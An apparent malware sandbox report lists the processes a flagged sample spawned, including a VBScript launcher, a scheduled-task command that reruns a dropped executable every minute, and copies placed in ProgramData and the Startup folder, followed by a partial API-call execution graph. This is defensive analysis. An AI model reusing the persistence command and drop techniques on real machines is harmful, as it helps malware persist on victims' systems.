                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff72bec0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:12
                                                                                                                                                                Start time:03:07:16
                                                                                                                                                                Start date:25/12/2024
                                                                                                                                                                Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:WSCript C:\Users\user\AppData\Local\Temp\VFNCBO.vbs
                                                                                                                                                                Imagebase:0x170000
                                                                                                                                                                File size:147'456 bytes
                                                                                                                                                                MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 0000000C.00000002.2962021382.0000000002B1B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 0000000C.00000002.2962613368.0000000002FF0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 0000000C.00000002.2962021382.0000000002AFB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                Has exited:false

                                                                                                                                                                General

                                                                                                                                                                Target ID:13
                                                                                                                                                                Start time:03:07:16
                                                                                                                                                                Start date:25/12/2024
                                                                                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:schtasks /create /tn VFNCBO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1
                                                                                                                                                                Imagebase:0x190000
                                                                                                                                                                File size:187'904 bytes
                                                                                                                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:16
                                                                                                                                                                Start time:03:07:18
                                                                                                                                                                Start date:25/12/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                                                                Imagebase:0xe00000
                                                                                                                                                                File size:916'992 bytes
                                                                                                                                                                MD5 hash:E18974062E92D1E85871E1BE1487F6DC
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                • Detection: 53%, ReversingLabs
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:19
                                                                                                                                                                Start time:03:07:27
                                                                                                                                                                Start date:25/12/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Windata\NUHORT.exe"
                                                                                                                                                                Imagebase:0xe00000
                                                                                                                                                                File size:916'992 bytes
                                                                                                                                                                MD5 hash:E18974062E92D1E85871E1BE1487F6DC
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:20
                                                                                                                                                                Start time:03:07:35
                                                                                                                                                                Start date:25/12/2024
                                                                                                                                                                Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                File size:771'584 bytes
                                                                                                                                                                MD5 hash:1D45B99034D67448EBF0776BD5699C84
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:21
                                                                                                                                                                Start time:03:07:43
                                                                                                                                                                Start date:25/12/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Windata\NUHORT.exe"
                                                                                                                                                                Imagebase:0xe00000
                                                                                                                                                                File size:916'992 bytes
                                                                                                                                                                MD5 hash:E18974062E92D1E85871E1BE1487F6DC
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:22
                                                                                                                                                                Start time:03:07:51
                                                                                                                                                                Start date:25/12/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe"
                                                                                                                                                                Imagebase:0x1e0000
                                                                                                                                                                File size:916'992 bytes
                                                                                                                                                                MD5 hash:E18974062E92D1E85871E1BE1487F6DC
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:23
                                                                                                                                                                Start time:03:07:59
                                                                                                                                                                Start date:25/12/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Windata\NUHORT.exe"
                                                                                                                                                                Imagebase:0xe00000
                                                                                                                                                                File size:916'992 bytes
                                                                                                                                                                MD5 hash:E18974062E92D1E85871E1BE1487F6DC
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:24
                                                                                                                                                                Start time:03:08:02
                                                                                                                                                                Start date:25/12/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                                                                Imagebase:0xe00000
                                                                                                                                                                File size:916'992 bytes
                                                                                                                                                                MD5 hash:E18974062E92D1E85871E1BE1487F6DC
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:26
                                                                                                                                                                Start time:03:09:01
                                                                                                                                                                Start date:25/12/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                                                                                                                                                Imagebase:0xe00000
                                                                                                                                                                File size:916'992 bytes
                                                                                                                                                                MD5 hash:E18974062E92D1E85871E1BE1487F6DC
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Disassembly

                                                                                                                                                                Reset < >

                                                                                                                                                                  Execution Graph

                                                                                                                                                                  Execution Coverage:4.3%
                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                  Signature Coverage:8.4%
                                                                                                                                                                  Total number of Nodes:2000
                                                                                                                                                                  Total number of Limit Nodes:172
                                                                                                                                                                  execution_graph 102522 25bc25 102523 25bc27 102522->102523 102526 2279f8 SHGetFolderPathW 102523->102526 102525 25bc30 102525->102525 102529 1e7e53 102526->102529 102528 227a25 102528->102525 102530 1e7ecf 102529->102530 102532 1e7e5f __wsetenvp 102529->102532 102542 1ea2fb 102530->102542 102533 1e7e7b 102532->102533 102534 1e7ec7 102532->102534 102538 1ea6f8 102533->102538 102541 1e7eda 48 API calls 102534->102541 102537 1e7e85 _memmove 102537->102528 102546 20010a 102538->102546 102540 1ea702 102540->102537 102541->102537 102543 1ea321 _memmove 102542->102543 102544 1ea309 102542->102544 102543->102537 102544->102543 102577 1eb8a7 102544->102577 102547 200112 __calloc_impl 102546->102547 102549 20012c 102547->102549 102550 20012e std::exception::exception 102547->102550 102555 2045ec 102547->102555 102549->102540 102569 207495 RaiseException 102550->102569 102552 200158 102570 2073cb 47 API calls _free 102552->102570 102554 20016a 102554->102540 102556 204667 __calloc_impl 102555->102556 102562 2045f8 __calloc_impl 102555->102562 102576 20889e 47 API calls __getptd_noexit 102556->102576 102559 20462b RtlAllocateHeap 102559->102562 102568 20465f 102559->102568 102561 204653 102574 20889e 47 API calls __getptd_noexit 102561->102574 102562->102559 102562->102561 102563 204603 102562->102563 102566 204651 102562->102566 102563->102562 102571 208e52 47 API calls __NMSG_WRITE 102563->102571 102572 208eb2 47 API calls 7 library calls 102563->102572 102573 201d65 GetModuleHandleExW 6C1F6DE0 ExitProcess ___crtCorExitProcess 102563->102573 102575 20889e 47 API calls __getptd_noexit 102566->102575 102568->102547 102569->102552 102570->102554 102571->102563 102572->102563 102574->102566 102575->102568 102576->102568 102578 1eb8ba 102577->102578 102580 1eb8b7 _memmove 102577->102580 102579 20010a 48 API calls 102578->102579 102579->102580 102580->102543 102581 206a80 102582 206a8c type_info::_Type_info_dtor 102581->102582 102618 208b7b GetStartupInfoW 102582->102618 102584 206a91 102620 20a937 GetProcessHeap 102584->102620 102586 206ae9 102587 206af4 102586->102587 102705 206bd0 47 API calls 3 library calls 102586->102705 102621 2087d7 102587->102621 102590 206afa 102592 206b05 __RTC_Initialize 102590->102592 102706 206bd0 47 API calls 3 library calls 102590->102706 102642 20ba66 102592->102642 102594 206b14 102595 206b20 GetCommandLineW 102594->102595 102707 206bd0 47 API calls 3 library calls 102594->102707 102661 213c2d GetEnvironmentStringsW 102595->102661 102598 206b1f 102598->102595 102602 206b45 102674 213a64 102602->102674 102605 206b4b 102606 206b56 102605->102606 102709 201d7b 47 API calls 3 library calls 102605->102709 102688 201db5 102606->102688 102609 206b5e 102610 206b69 __wwincmdln 102609->102610 102710 201d7b 47 API calls 3 library calls 102609->102710 102692 1e3682 102610->102692 102613 206b7d 102614 206b8c 102613->102614 102711 202011 47 API calls _doexit 102613->102711 102712 201da6 47 API calls _doexit 102614->102712 102617 206b91 type_info::_Type_info_dtor 102619 208b91 102618->102619 102619->102584 102620->102586 102713 201e5a 30 API calls 2 library calls 102621->102713 102623 2087dc 102714 208ab3 InitializeCriticalSectionAndSpinCount 102623->102714 102625 2087e1 102626 2087e5 102625->102626 102716 208afd TlsAlloc 102625->102716 102715 20884d 50 API calls 2 library calls 102626->102715 102629 2087ea 102629->102590 102630 2087f7 102630->102626 102631 208802 102630->102631 102717 207616 102631->102717 102634 208844 102725 20884d 50 API calls 2 library calls 102634->102725 102637 208823 102637->102634 102639 208829 102637->102639 102638 208849 102638->102590 102724 208724 47 API calls 4 library calls 102639->102724 102641 208831 GetCurrentThreadId 102641->102590 102643 20ba72 type_info::_Type_info_dtor 102642->102643 102734 208984 102643->102734 102645 20ba79 102646 207616 __calloc_crt 47 API calls 102645->102646 102647 20ba8a 102646->102647 102648 20baf5 GetStartupInfoW 102647->102648 102649 20ba95 type_info::_Type_info_dtor @_EH4_CallFilterFunc@8 102647->102649 102656 20bc33 102648->102656 102658 20bb0a 102648->102658 102649->102594 102650 20bcf7 102741 20bd0b RtlLeaveCriticalSection _doexit 102650->102741 102652 20bc7c GetStdHandle 102652->102656 102653 207616 __calloc_crt 47 API calls 102653->102658 102654 20bc8e GetFileType 102654->102656 102655 20bb58 102655->102656 102659 20bb98 InitializeCriticalSectionAndSpinCount 102655->102659 102660 20bb8a GetFileType 102655->102660 102656->102650 102656->102652 102656->102654 102657 20bcbb InitializeCriticalSectionAndSpinCount 102656->102657 102657->102656 102658->102653 102658->102655 102658->102656 102659->102655 102660->102655 102660->102659 102662 206b30 102661->102662 102663 213c3e 102661->102663 102668 21382b GetModuleFileNameW 102662->102668 102780 207660 47 API calls std::exception::_Copy_str 102663->102780 102666 213c64 _memmove 102667 213c7a FreeEnvironmentStringsW 102666->102667 102667->102662 102670 21385f _wparse_cmdline 102668->102670 102669 206b3a 102669->102602 102708 201d7b 47 API calls 3 library calls 102669->102708 102670->102669 102671 213899 102670->102671 102781 207660 47 API calls std::exception::_Copy_str 102671->102781 102673 21389f _wparse_cmdline 102673->102669 102675 213a7d __wsetenvp 102674->102675 102676 213a75 102674->102676 102677 207616 __calloc_crt 47 API calls 102675->102677 102676->102605 102678 213aa6 __wsetenvp 102677->102678 102678->102676 102680 207616 __calloc_crt 47 API calls 102678->102680 102681 213afd 102678->102681 102682 213b22 102678->102682 102685 213b39 102678->102685 102782 213317 47 API calls 2 library calls 102678->102782 102679 2028ca _free 47 API calls 102679->102676 102680->102678 102681->102679 102683 2028ca _free 47 API calls 102682->102683 102683->102676 102783 207ab0 IsProcessorFeaturePresent 102685->102783 102687 213b45 102687->102605 102689 201dc1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 102688->102689 102691 201e00 __IsNonwritableInCurrentImage 102689->102691 102806 201b2a 52 API calls __cinit 102689->102806 102691->102609 102693 2523b5 102692->102693 102694 1e369c 102692->102694 102695 1e36d6 745EC8D0 102694->102695 102807 202025 102695->102807 102699 1e3702 102819 1e32de SystemParametersInfoW SystemParametersInfoW 102699->102819 102701 1e370e 102820 1e374e GetCurrentDirectoryW 102701->102820 102704 1e373b 102704->102613 102705->102587 102706->102592 102707->102598 102711->102614 102712->102617 102713->102623 102714->102625 102715->102629 102716->102630 102719 20761d 102717->102719 102720 20765a 102719->102720 102721 20763b Sleep 102719->102721 102726 213e5a 102719->102726 102720->102634 102723 208b59 TlsSetValue 102720->102723 102722 207652 102721->102722 102722->102719 102722->102720 102723->102637 102724->102641 102725->102638 102727 213e65 102726->102727 102732 213e80 __calloc_impl 102726->102732 102728 213e71 102727->102728 102727->102732 102733 20889e 47 API calls __getptd_noexit 102728->102733 102730 213e90 RtlAllocateHeap 102731 213e76 102730->102731 102730->102732 102731->102719 102732->102730 102732->102731 102733->102731 102735 208995 102734->102735 102736 2089a8 RtlEnterCriticalSection 102734->102736 102742 208a0c 102735->102742 102736->102645 102738 20899b 102738->102736 102766 201d7b 47 API calls 3 library calls 102738->102766 102741->102649 102743 208a18 type_info::_Type_info_dtor 102742->102743 102744 208a21 102743->102744 102745 208a39 102743->102745 102767 208e52 47 API calls __NMSG_WRITE 102744->102767 102750 208aa1 type_info::_Type_info_dtor 102745->102750 102759 208a37 102745->102759 102747 208a26 102768 208eb2 47 API calls 7 library calls 102747->102768 102750->102738 102751 208a4d 102753 208a63 102751->102753 102754 208a54 102751->102754 102752 208a2d 102769 201d65 GetModuleHandleExW 6C1F6DE0 ExitProcess ___crtCorExitProcess 102752->102769 102755 208984 __lock 46 API calls 102753->102755 102771 20889e 47 API calls __getptd_noexit 102754->102771 102758 208a6a 102755->102758 102761 208a79 InitializeCriticalSectionAndSpinCount 102758->102761 102762 208a8e 102758->102762 102759->102745 102770 207660 47 API calls std::exception::_Copy_str 102759->102770 102760 208a59 102760->102750 102763 208a94 102761->102763 102772 2028ca 102762->102772 102778 208aaa RtlLeaveCriticalSection _doexit 102763->102778 102767->102747 102768->102752 102770->102751 102771->102760 102773 2028d3 RtlFreeHeap 102772->102773 102777 2028fc __dosmaperr 102772->102777 102774 2028e8 102773->102774 102773->102777 102779 20889e 47 API calls __getptd_noexit 102774->102779 102776 2028ee GetLastError 102776->102777 102777->102763 102778->102750 102779->102776 102780->102666 102781->102673 102782->102678 102784 207abb 102783->102784 102789 207945 102784->102789 102788 207ad6 102788->102687 102790 20795f _memset __call_reportfault 102789->102790 102791 20797f IsDebuggerPresent 102790->102791 102797 208e3c SetUnhandledExceptionFilter UnhandledExceptionFilter 102791->102797 102794 207a43 __call_reportfault 102798 20b4bf 102794->102798 102795 207a66 102796 208e27 GetCurrentProcess TerminateProcess 102795->102796 102796->102788 102797->102794 102799 20b4c7 102798->102799 102800 20b4c9 IsProcessorFeaturePresent 102798->102800 102799->102795 102802 214560 102800->102802 102805 21450f 5 API calls 2 library calls 102802->102805 102804 214643 102804->102795 102805->102804 102806->102691 102808 208984 __lock 47 API calls 102807->102808 102809 202030 102808->102809 102865 208ae8 RtlLeaveCriticalSection 102809->102865 102811 1e36fb 102812 20208d 102811->102812 102813 2020b1 102812->102813 102814 202097 102812->102814 102813->102699 102814->102813 102866 20889e 47 API calls __getptd_noexit 102814->102866 102816 2020a1 102867 207aa0 8 API calls __wmakepath_s 102816->102867 102818 2020ac 102818->102699 102819->102701 102868 1e4257 102820->102868 102822 1e377f IsDebuggerPresent 102823 2521b7 MessageBoxA 102822->102823 102824 1e378d 102822->102824 102827 2521d0 102823->102827 102825 1e3852 102824->102825 102824->102827 102828 1e37aa 102824->102828 102826 1e3859 SetCurrentDirectoryW 102825->102826 102829 1e3716 SystemParametersInfoW 102826->102829 103029 222f5b 48 API calls 102827->103029 102932 1e3bff 102828->102932 102829->102704 102833 2521e0 102838 2521f6 SetCurrentDirectoryW 102833->102838 102834 1e37c8 GetFullPathNameW 102942 1e34f3 102834->102942 102837 1e380f 102839 1e3818 102837->102839 103030 21be31 AllocateAndInitializeSid CheckTokenMembership FreeSid 102837->103030 102838->102829 102957 1e30a5 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 102839->102957 102842 252213 102842->102839 102845 252224 GetModuleFileNameW 102842->102845 103031 1ecaee 102845->103031 102846 1e3822 102848 1e3837 102846->102848 103027 1e3598 67 API calls _memset 102846->103027 102965 1ee1f0 102848->102965 102852 252271 103038 1e39e8 48 API calls 2 library calls 102852->103038 102853 25224c 103035 1e39e8 48 API calls 2 library calls 102853->103035 102857 25226d GetForegroundWindow ShellExecuteW 102862 2522a5 Mailbox 102857->102862 102859 252257 103036 1e39e8 48 API calls 2 library calls 102859->103036 102862->102825 102863 252264 103037 1e39e8 48 API calls 2 library calls 102863->103037 102865->102811 102866->102816 102867->102818 103039 1e3c70 102868->103039 102872 1e4278 GetModuleFileNameW 103056 1e34c1 102872->103056 102877 1ecaee 48 API calls 102878 1e42ba 102877->102878 103071 1ed380 102878->103071 102880 1e42ca Mailbox 102881 1ecaee 48 API calls 102880->102881 102882 1e42f2 102881->102882 102883 1ed380 55 API calls 102882->102883 102884 1e4305 Mailbox 102883->102884 102885 1ecaee 48 API calls 102884->102885 102886 1e4316 102885->102886 103075 1ed2d2 102886->103075 102888 1e4328 Mailbox 103081 1ed3d2 102888->103081 102894 1e4355 102895 1e435f 102894->102895 102896 2520f7 102894->102896 102897 201bc7 _W_store_winword 59 API calls 102895->102897 102898 1e4477 48 API calls 102896->102898 102899 1e436a 102897->102899 102900 25210b 102898->102900 102899->102900 102901 1e4374 102899->102901 102902 1e4477 48 API calls 102900->102902 102903 201bc7 _W_store_winword 59 API calls 102901->102903 102904 252127 102902->102904 102905 1e437f 102903->102905 102907 25212f GetModuleFileNameW 102904->102907 102906 1e4389 102905->102906 102905->102907 102909 201bc7 _W_store_winword 59 API calls 102906->102909 102908 1e4477 48 API calls 102907->102908 102910 252160 102908->102910 102911 1e4394 102909->102911 103135 1ec935 102910->103135 102913 252185 _wcscpy 102911->102913 102917 1e4477 48 API calls 102911->102917 102926 1e43d6 102911->102926 102921 1e4477 48 API calls 102913->102921 102914 1e43e7 103102 1e3320 102914->103102 102916 1e4477 48 API calls 102919 25217d 102916->102919 102920 1e43b8 _wcscpy 102917->102920 102919->102913 102925 1e4477 48 API calls 102920->102925 102923 2521ab 102921->102923 102922 1e43ff 103113 1f14a0 102922->103113 102923->102923 102925->102926 102926->102913 102926->102914 102927 1f14a0 48 API calls 102929 1e440f 102927->102929 102929->102927 102930 1e4477 48 API calls 102929->102930 102931 1e4451 Mailbox 102929->102931 103129 1e7bef 102929->103129 102930->102929 102931->102822 102936 1e3c1f _memset 102932->102936 102934 1e3c28 103619 1e3a67 SHGetMalloc 102934->103619 102939 1e37c0 102936->102939 103612 1e31b8 102936->103612 102937 1e3c31 103624 1e3b45 GetFullPathNameW 102937->103624 102939->102825 102939->102834 103707 1ea716 102942->103707 102944 1e3501 102956 1e3575 102944->102956 103718 1e21dd 85 API calls 102944->103718 102946 1e350a 102946->102956 103719 1e5460 87 API calls Mailbox 102946->103719 102948 1e3513 102949 1e3517 GetFullPathNameW 102948->102949 102948->102956 102950 1e7e53 48 API calls 102949->102950 102951 1e3541 102950->102951 102952 1e7e53 48 API calls 102951->102952 102953 1e354e 102952->102953 102954 2566b4 _wcscat 102953->102954 102955 1e7e53 48 API calls 102953->102955 102955->102956 102956->102833 102956->102837 102958 1e310f 102957->102958 102959 2521b0 102957->102959 103722 1e318a 102958->103722 102964 1e2e9d CreateWindowExW CreateWindowExW ShowWindow ShowWindow 102964->102846 102966 1ee216 102965->102966 103025 1ee226 Mailbox 102965->103025 102967 1ee670 102966->102967 102966->103025 103891 1fecee 405 API calls 102967->103891 102969 1e3842 102969->102825 103028 1e2b94 Shell_NotifyIconW _memset 102969->103028 102971 1ee681 102971->102969 102973 1ee68e 102971->102973 102972 1ee26c PeekMessageW 102972->103025 103893 1fec33 405 API calls Mailbox 102973->103893 102975 255b13 Sleep 102975->103025 102976 1ee695 LockWindowUpdate DestroyWindow GetMessageW 102976->102969 102979 1ee6c7 102976->102979 102977 1ee4e7 102977->102969 103892 1e322e 16 API calls 102977->103892 102981 2562a7 TranslateMessage DispatchMessageW GetMessageW 102979->102981 102981->102981 102983 2562d7 102981->102983 102982 1fcf79 49 API calls 102982->103025 102983->102969 102984 1ee657 PeekMessageW 102984->103025 102985 20010a 48 API calls 102985->103025 102986 1ee517 timeGetTime 102986->103025 102988 1ec935 48 API calls 102988->103025 102989 1ee641 TranslateMessage DispatchMessageW 102989->102984 102990 255dfc WaitForSingleObject 102993 255e19 GetExitCodeProcess CloseHandle 102990->102993 102990->103025 102991 1ed3d2 48 API calls 103020 255cce Mailbox 102991->103020 102992 256147 Sleep 102992->103020 102993->103025 102994 1ee6cc timeGetTime 103894 1fcf79 49 API calls 102994->103894 102997 255feb Sleep 102997->103025 103001 2561de GetExitCodeProcess 103003 2561f4 WaitForSingleObject 103001->103003 103004 25620a CloseHandle 103001->103004 103003->103004 103003->103025 103004->103020 103005 255cea Sleep 103005->103025 103006 1e1dce 106 API calls 103006->103025 103008 255cd7 Sleep 103008->103005 103009 248a48 107 API calls 103009->103020 103010 256266 Sleep 103010->103025 103012 1ecaee 48 API calls 103012->103020 103016 1ed380 55 API calls 103016->103020 103020->102991 103020->103001 103020->103005 103020->103008 103020->103009 103020->103010 103020->103012 103020->103016 103020->103025 103896 2256dc 49 API calls Mailbox 103020->103896 103897 1fcf79 49 API calls 103020->103897 103898 1e1000 405 API calls 103020->103898 103957 23d12a 50 API calls 103020->103957 103958 228355 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 103020->103958 103959 1fe3a5 timeGetTime 103020->103959 103960 226f5b CreateToolhelp32Snapshot Process32FirstW 103020->103960 103021 22d520 85 API calls 103021->103025 103023 1ed380 55 API calls 103023->103025 103024 1ecaee 48 API calls 103024->103025 103025->102972 103025->102975 103025->102977 103025->102982 103025->102984 103025->102985 103025->102986 103025->102988 103025->102989 103025->102990 103025->102992 103025->102994 103025->102997 103025->103005 103025->103006 103025->103020 103025->103021 103025->103023 103025->103024 103026 1e1000 381 API calls 103025->103026 103730 1ee7e0 103025->103730 103737 1eea00 103025->103737 103787 1f44e0 103025->103787 103810 1f3680 103025->103810 103880 1ff381 103025->103880 103885 1fed1a 103025->103885 103890 1ee7b0 405 API calls Mailbox 103025->103890 103895 248b20 48 API calls 103025->103895 103899 1efa40 103025->103899 103956 1fe3a5 timeGetTime 103025->103956 103026->103025 103027->102848 103028->102825 103029->102833 103030->102842 103032 1ecafd __wsetenvp _memmove 103031->103032 103033 20010a 48 API calls 103032->103033 103034 1ecb3b 103033->103034 103034->102852 103034->102853 103035->102859 103036->102863 103037->102857 103038->102857 103040 1ed3d2 48 API calls 103039->103040 103041 1e3c80 103040->103041 103042 1ea359 103041->103042 103043 1ea366 __ftell_nolock 103042->103043 103044 1e7e53 48 API calls 103043->103044 103049 1ea4cc Mailbox 103043->103049 103046 1ea398 103044->103046 103055 1ea3ce Mailbox 103046->103055 103139 1ea4f6 103046->103139 103047 1ea49f 103048 1ecaee 48 API calls 103047->103048 103047->103049 103051 1ea4c0 103048->103051 103049->102872 103050 1ecaee 48 API calls 103050->103055 103143 1e5b47 48 API calls _memmove 103051->103143 103053 1ea4f6 48 API calls 103053->103055 103055->103047 103055->103049 103055->103050 103055->103053 103142 1e5b47 48 API calls _memmove 103055->103142 103144 1e3f9b 103056->103144 103058 1e34ea 103068 1e8182 103058->103068 103062 2534c3 103064 2028ca _free 47 API calls 103062->103064 103065 2534d0 103064->103065 103066 1e3e39 83 API calls 103065->103066 103067 2534d9 103066->103067 103067->103067 103069 20010a 48 API calls 103068->103069 103070 1e42ad 103069->103070 103070->102877 103072 1ed38b 103071->103072 103073 1ed3b4 103072->103073 103598 1ed772 55 API calls 103072->103598 103073->102880 103078 1ed2df 103075->103078 103079 1ed30a 103075->103079 103076 1ed2e6 103076->103079 103599 1ed349 53 API calls 103076->103599 103078->103076 103600 1ed349 53 API calls 103078->103600 103079->102888 103082 20010a 48 API calls 103081->103082 103083 1ed3f3 103082->103083 103084 20010a 48 API calls 103083->103084 103085 1e433b 103084->103085 103086 1e4477 103085->103086 103087 1e449a 103086->103087 103088 1e4481 103086->103088 103090 1e7e53 48 API calls 103087->103090 103089 1ec935 48 API calls 103088->103089 103091 1e4347 103089->103091 103090->103091 103092 201bc7 103091->103092 103093 201bd3 103092->103093 103094 201c48 103092->103094 103098 201bf8 103093->103098 103601 20889e 47 API calls __getptd_noexit 103093->103601 103603 201c5a 59 API calls 4 library calls 103094->103603 103097 201c55 103097->102894 103098->102894 103099 201bdf 103602 207aa0 8 API calls __wmakepath_s 103099->103602 103101 201bea 103101->102894 103103 1e3334 103102->103103 103105 1e3339 Mailbox 103102->103105 103604 1e342c 48 API calls 103103->103604 103111 1e3347 103105->103111 103605 1e346e 48 API calls 103105->103605 103107 20010a 48 API calls 103108 1e33d8 103107->103108 103110 20010a 48 API calls 103108->103110 103109 1e3422 103109->102922 103112 1e33e3 103110->103112 103111->103107 103111->103109 103112->102922 103114 1f1606 103113->103114 103116 1f14b2 103113->103116 103114->102929 103117 20010a 48 API calls 103116->103117 103128 1f14be 103116->103128 103118 255299 103117->103118 103121 20010a 48 API calls 103118->103121 103119 1f156d 103119->102929 103120 1f14c9 103120->103119 103122 20010a 48 API calls 103120->103122 103127 2552a4 103121->103127 103123 1f15af 103122->103123 103124 1f15c2 103123->103124 103606 1fd6b4 48 API calls 103123->103606 103124->102929 103126 20010a 48 API calls 103126->103127 103127->103126 103127->103128 103128->103120 103607 1e346e 48 API calls 103128->103607 103130 1e7c3a 103129->103130 103131 1e7bfb 103129->103131 103132 1ec935 48 API calls 103130->103132 103133 20010a 48 API calls 103131->103133 103134 1e7c0e 103132->103134 103133->103134 103134->102929 103136 1ec948 103135->103136 103137 1ec940 103135->103137 103136->102916 103608 1ed805 103137->103608 103140 1eb8a7 48 API calls 103139->103140 103141 1ea501 103140->103141 103141->103046 103142->103055 103143->103049 103209 1e3f5d 103144->103209 103149 255830 103152 1e3e39 83 API calls 103149->103152 103150 1e3fc6 LoadLibraryExW 103219 1e3e78 103150->103219 103154 255837 103152->103154 103155 1e3e78 3 API calls 103154->103155 103157 25583f 103155->103157 103245 1e417d 103157->103245 103158 1e3fed 103158->103157 103159 1e3ff9 103158->103159 103161 1e3e39 83 API calls 103159->103161 103163 1e34e2 103161->103163 103163->103058 103168 22cc82 103163->103168 103165 255866 103253 1e41cb 103165->103253 103167 255873 103169 1e41a7 82 API calls 103168->103169 103170 22ccf1 103169->103170 103434 22ce59 103170->103434 103173 1e417d 64 API calls 103174 22cd1e 103173->103174 103175 1e417d 64 API calls 103174->103175 103176 22cd2e 103175->103176 103177 1e417d 64 API calls 103176->103177 103178 22cd49 103177->103178 103179 1e417d 64 API calls 103178->103179 103180 22cd64 103179->103180 103181 1e41a7 82 API calls 103180->103181 103182 22cd7b 103181->103182 103183 2045ec std::exception::_Copy_str 47 API calls 103182->103183 103184 22cd82 103183->103184 103185 2045ec std::exception::_Copy_str 47 API calls 103184->103185 103186 22cd8c 103185->103186 103187 1e417d 64 API calls 103186->103187 103188 22cda0 103187->103188 103189 22c846 